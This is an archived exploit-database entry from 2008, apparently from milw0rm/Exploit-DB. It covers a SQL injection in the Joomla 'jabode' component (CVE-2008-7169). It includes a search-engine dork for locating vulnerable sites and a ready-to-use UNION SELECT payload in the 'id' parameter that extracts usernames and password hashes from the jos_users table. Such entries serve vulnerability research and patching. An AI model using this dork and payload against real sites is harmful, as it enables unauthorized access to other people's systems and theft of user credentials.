Joomla! Component jabode - 'id' SQL Injection
Author: His0k4
type: webapps
platform: php
port:
date_added: 2008-06-27
date_updated: 2016-12-09
verified: 1
codes: OSVDB-57818;CVE-2008-7169
tags:
aliases:
screenshot_url:
application_url:
/---------------------------------------------------------------\
\ /
/ Joomla Component jabode Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:com_jabode
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id={SQL}
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,password) FROM jos_users--
[*] Funny note: You can change "taurus" to your sign for best results xd...
----------------------------------------------------------------------------
[*] Greetings : All friends & muslims HaCkeRs...
[*] Greetings2: http://www.dz-secure.com
http://palcastle.org/cc
# milw0rm.com [2008-06-28]